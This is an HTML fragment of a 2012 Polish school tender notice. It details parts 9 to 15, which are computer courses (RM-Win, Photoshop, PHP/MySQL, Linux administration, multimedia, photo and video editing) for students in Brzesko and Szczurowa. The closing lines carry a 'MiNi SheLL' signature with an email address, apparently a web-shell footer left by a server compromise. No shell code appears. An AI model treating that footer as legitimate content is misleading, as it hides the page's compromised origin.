<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 10 uczniów
2. Czas trwania kursu wynosi:  40 godzin 
3. Program kursu powinien obejmować przynajmniej zagadnienia umożliwiające nabycie umiejętności sprawnego posługiwania się programem RM-Win w zakresie: tworzenia przekrojów stalowych, żelbetowych, drewnianych, tworzenia  schematu konstrukcji, zestawienia obciążeń, analizowania naprężeń,  sił  przekrojowych,  reakcji podporowych, projektowania prętów  stalowych, żelbetowych i drewnianych.
4. Zajęcia powinny być prowadzone metodami aktywizującymi w formie ćwiczeń praktycznych. Zajęcia odbywać się będą w sali wyposażonej w minimum 10 stanowisk komputerowych po jednym dla każdego uczestnika z zainstalowanym oprogramowaniem umożliwiającym realizację celów kursu. 
5. Zamawiający zapewnia: salę lekcyjną, 1x rzutnik z komputerem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9: Kurs grafika komputerowa dla uczniów  grupy I w ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 10 uczniów
2. Czas trwania kursu wynosi: 50 godzin 
3. Celem kursu jest przekazanie uczestnikom wiedzy i wyrobienie umiejętności z zakresu przygotowania projektów graficznych w środowisku programu Adobe Photoshop ze szczególnym uwzględnieniem: fotoedycji, fotomontażu, retuszu, druku oraz optymalizacji grafiki pod kątem wykorzystania ich na stronach internetowych. 
4. Zajęcia powinny być prowadzone metodami aktywizującymi w formie ćwiczeń praktycznych. Zajęcia odbywać się będą w sali wyposażonej w minimum 10 stanowisk komputerowych po jednym dla każdego uczestnika z zainstalowanym oprogramowaniem umożliwiającym realizację celów kursu. 
5. Zamawiający zapewnia: salę lekcyjną, 1x rzutnik z komputerem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10: Kurs grafika komputerowa dla uczniów  grupy II w ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 20 uczniów w podziale na dwie grupy każda po 10 uczniów
2. Czas trwania kursu wynosi: 50 godzin dla każdej grupy.
3. Celem kursu jest przekazanie uczestnikom wiedzy i wyrobienie umiejętności z zakresu przygotowania projektów graficznych w środowisku programu Adobe Photoshop ze szczególnym uwzględnieniem: fotoedycji, fotomontażu, retuszu, druku oraz optymalizacji grafiki pod kątem wykorzystania ich na stronach internetowych. 
4. Zajęcia powinny być prowadzone metodami aktywizującymi w formie ćwiczeń praktycznych. Zajęcia odbywać się będą w sali wyposażonej w minimum 10 stanowisk komputerowych po jednym dla każdego uczestnika z zainstalowanym oprogramowaniem umożliwiającym realizację celów kursu. 
5. Zamawiający zapewnia: salę lekcyjną, 1x rzutnik z komputerem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadania 11: Kurs PHP + MYSQL - tworzenie internetowych  aplikacji bazodanowych  dla uczniów ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 10 uczniów.
2. Czas trwania kursu wynosi: 80 godz. lekcyjnych.
3. Celem kursu jest  wyrobienie u  uczestników  umiejętności programowania w języku PHP, zapoznanie ich z jego strukturą oraz wykształcenie dobrych nawyków programistycznych. Poza nauką programowania w języku PHP na kursie uczestnicy powinni poznać podstawy relacyjnych baz danych  i języka SQL oraz nabyć umiejętność praktycznego wykorzystania zdobytej wiedzy do tworzenia dynamicznych aplikacji obsługujących internetową bazę danych jak np. forum, blog lub system zarządzania treścią. Powinien również uwzględniać zagadnienia bezpieczeństwa optymalizacji i testowania tworzonych aplikacji.
4 Zajęcia powinny być prowadzone metodami aktywizującymi w formie ćwiczeń praktycznych. Zajęcia odbywać się będą w sali wyposażonej w minimum 10 stanowisk komputerowych po jednym dla każdego uczestnika z zainstalowanym oprogramowaniem umożliwiającym realizację celów kursu oraz w  lokalny serwer z zainstalowaną usługą www i ftp pozwalający przetrenować zdalne zarządzanie tworzoną witryną. Dopuszcza się aby część zajęć max. 30% związanych z zagadnieniami teoretycznymi prowadzona była w formie zdalnej na platformie e-learningu. W tym przypadku Zamawiający zastrzega sobie możliwość dostępu do platformy w celu kontroli i oceny merytorycznej zamieszczonych tam materiałów
5. Zamawiający zapewnia: salę lekcyjną, 1x rzutnik z komputerem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadania 12: Kurs Administracja serwerem internetowym z systemem Linux  dla uczniów ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 10 uczniów.
2. Czas trwania kursu wynosi: 90 godz. lekcyjnych.
3. Celem kursu jest  nabycie przez słuchaczy wiedzy i umiejętności w administrowaniu serwerem i usługami sieciowymi w systemie operacyjnym Linux. Program kursu musi uwzględniać co najmniej zagadnienia związane z: administracją systemem, administracją serwerem sieciowym oraz administracją serwerem internetowym i intranetowym. Zajęcia powinny być prowadzone metodami aktywizującymi w formie ćwiczeń praktycznych. Zajęcia odbywać się będą w sali wyposażonej w minimum 10 stanowisk komputerowych po jednym dla każdego uczestnika z zainstalowanym oprogramowaniem umożliwiającym realizację celów.
Dopuszcza się aby część zajęć max. 30% związanych z zagadnieniami teoretycznymi prowadzona była w formie zdalnej na platformie e-learningu. W tym przypadku Zamawiający zastrzega sobie możliwość dostępu do platformy w celu kontroli i oceny merytorycznej zamieszczonych tam materiałów.
4. Zamawiający zapewnia: salę lekcyjną, 1x rzutnik z komputerem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadania 13: Kurs obsługi nowoczesnych  urządzeń multimedialnych dla uczniów ZSP nr 1 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 12 uczniów.
2. Czas trwania kursu wynosi: 20 godz. zajęć. 
3. Wykonawca zobowiązany jest do przeprowadzenia szkolenia umożliwiającego nabycie umiejętności obsługi nowoczesnych multimediów tj. tablicy interaktywnej, projektora, wizualizera, skanera, aparatu oraz kamery cyfrowej oraz umiejętność tworzenia prostych prac z wykorzystaniem nowoczesnych środków multimedialnych.
4 Tematyka kursu zawierać powinna między innymi następujące zagadnienia: 
a) Obsługa projektora i laptopa:  sposób podłączania, wykrywanie monitora, bezpieczne wyłączanie projektora
b) Prawa autorskie a ściąganie plików z Internetu
c) Pliki dźwiękowe, filmowe i ich konwersja na różne formaty.
d) Obsługa kamery cyfrowej i aparatu cyfrowego: nagrywanie filmów, robienie zdjęć, montowanie filmu z wykorzystaniem nagrań i zrobionych zdjęć
e) Tablica interaktywna - sposób na multimedialną prezentację.
f) Wizualizer, skaner, laptop , projektor - prezentacja danych za pomocą różnych urządzeń.
5. Zamawiający zapewnia: salę do przeprowadzenia kursu, laptopy dla uczestników kursu, laptop  dla prowadzącego oraz tablicę interaktywną z rzutnikiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie 14: Kurs Obróbka zdjęć cyfrowych i materiału video dla uczniów ZSP nr 1 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników zajęć - 12 uczniów.
2.	Czas trwania kursu wynosi: 35 godz. zajęć. 
3. Wykonawca zobowiązany jest do przeprowadzenia szkolenia umożliwiającego nabycie umiejętności obsługi aparatu cyfrowego (z funkcjami zaawansowanymi tego urządzenia), obróbki  zdjęć za pomocą programu Gimp lub Photoshop, z uwzględnieniem retuszu zdjęć, animacji, morphingu lub innych zagadnień pozwalających poznać uczniowi szerokie spectrum możliwości jakimi dysponują te programy (wtyczki, filtry, warstwy, itd.). Program kursu ma  zapewnić uczniom zapoznanie z techniką wykonywania fotografii z uwzględnieniem gry światła i cienia, oraz sposobami robienia fotografii zdarzeń dynamicznych (sport, itp.).
W module obróbki video kursanci powinni poznać kwestie importu video, wyboru formatu zapisu filmu, zapoznać się z nośnikami danych dla współczesnych kamer video oraz poznać program do obróbki i konwersji materiału wideo (np. Adobe Premiere lub inny równoważny),  zasady i technikę montażu podstawowego obrazu, dodawania dźwięku, tworzenia napisów, tworzenie krótkiego filmu oraz jego prezentacja, przetwarzanie dźwięku.
4. Zamawiający zapewnia: salę komputerową z dostępem do Internetu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie 15: Kurs Obróbka zdjęć cyfrowych i materiału video dla uczniów ZS w Szczurowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 10 uczniów.
2. Czas trwania kursu wynosi: 35 godzin
3.  Wykonawca zobowiązany jest do przeprowadzenia szkolenia umożliwiającego nabycie umiejętności obsługi aparatu cyfrowego (z funkcjami zaawansowanymi tego urządzenia), obróbki  zdjęć za pomocą programu Gimp lub Photoshop, z uwzględnieniem retuszu zdjęć, animacji, morphingu lub innych zagadnień pozwalających poznać uczniowi szerokie spectrum możliwości jakimi dysponują te programy (wtyczki, filtry, warstwy, itd.). Program kursu ma  zapewnić uczniom zapoznanie z techniką wykonywania fotografii z uwzględnieniem gry światła i cienia, oraz sposobami robienia fotografii zdarzeń dynamicznych (sport, itp.). W module obróbki video kursanci powinni poznać kwestie importu video, wyboru formatu zapisu filmu, zapoznać się z nośnikami danych dla współczesnych kamer video oraz poznać program do obróbki i konwersji materiału wideo (np. Adobe Premiere lub inny równoważny),  zasady i technikę montażu podstawowego obrazu, dodawania dźwięku, tworzenia napisów, tworzenie krótkiego filmu oraz jego prezentacja, przetwarzanie dźwięku.
4. Zamawiający zapewnia: salę komputerową z dostępem do Internetu (nie zapewnia się programów komputerowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com